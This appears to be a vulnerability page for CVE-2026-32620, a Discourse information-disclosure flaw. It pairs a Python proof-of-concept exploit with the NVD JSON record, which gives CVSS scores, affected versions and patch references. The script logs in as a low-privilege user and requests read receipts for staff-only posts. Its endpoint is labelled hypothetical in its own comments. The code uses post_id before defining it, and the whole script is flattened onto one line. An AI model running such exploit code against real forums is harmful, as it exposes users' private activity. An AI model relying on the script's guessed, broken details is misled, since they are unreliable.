CVE-2026-32620

import requests # Target configuration target_url = "https://example.discourse.site" login_endpoint = f"{target_url}/session" # Hypothetical endpoint for read receipts based on vulnerability description read_receipt_endpoint = f"{target_url}/posts/{post_id}/read-receipts" # User credentials (Low privilege) username = "normal_user" password = "user_password" session = requests.Session() # Step 1: Authenticate login_payload = { "login": username, "password": password } # Note: Actual Discourse login might involve CSRF tokens or specific API headers response = session.post(login_endpoint, json=login_payload) if response.status_code == 200: print("[+] Login successful.") # Step 2: Exploit - Attempt to access read receipts for a staff-only post # Replace with a known Staff Post ID post_id = 12345 print(f"[*] Attempting to fetch read receipts for Post ID: {post_id}...") exploit_response = session.get(read_receipt_endpoint) if exploit_response.status_code == 200: data = exploit_response.json() # Check if sensitive metadata (read receipts) is returned if "users" in data or "readers" in data: print("[+] Vulnerability Confirmed! Leaked Read Receipts:") print(data) else: print("[-] Data retrieved, but does not contain expected reader info.") else: print(f"[-] Request failed with status code: {exploit_response.status_code}") else: print("[-] Login failed.")

{"cve": {"id": "CVE-2026-32620", "sourceIdentifier": "[email protected]", "published": "2026-03-31T18:16:50.690", "lastModified": "2026-04-09T18:30:46.703", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Discourse is an open-source discussion platform. From versions 2026.1.0-latest to before 2026.1.3, 2026.2.0-latest to before 2026.2.2, and 2026.3.0-latest to before 2026.3.0, non-staff users could access read receipt information for staff-only posts they weren't supposed to see. No post content was exposed, only metadata about who read the post and when. This issue has been patched in versions 2026.1.3, 2026.2.2, and 2026.3.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:discourse:discourse:*:*:*:*:latest:*:*:*", "versionStartIncluding": "2026.1.0", "versionEndExcluding": "2026.1.3", "matchCriteriaId": "F64DA8FA-BC32-4EB9-B508-6425684D3245"}, {"vulnerable": true, "criteria": "cpe:2.3:a:discourse:discourse:*:*:*:*:latest:*:*:*", "versionStartIncluding": "2026.2.0", "versionEndExcluding": "2026.2.2", "matchCriteriaId": "26546710-17B3-4C72-930F-3BE0AD969127"}, {"vulnerable": true, "criteria": "cpe:2.3:a:discourse:discourse:2026.3.0:*:*:*:latest:*:*:*", "matchCriteriaId": "E3FE9277-4F6B-4FD0-991F-F0FB8D226E1C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:discourse:discourse:2026.3.0:*:*:*:latest.1:*:*:*", "matchCriteriaId": "DFA536C2-E9D9-4A03-89C2-C344DE682EA1"}]}]}], "references": [{"url": "https://github.com/discourse/discourse/commit/bf8dbf6155ae483245d42a0164181bc226af674d", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/discourse/discourse/security/advisories/GHSA-xgg2-vwr6-2c65", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}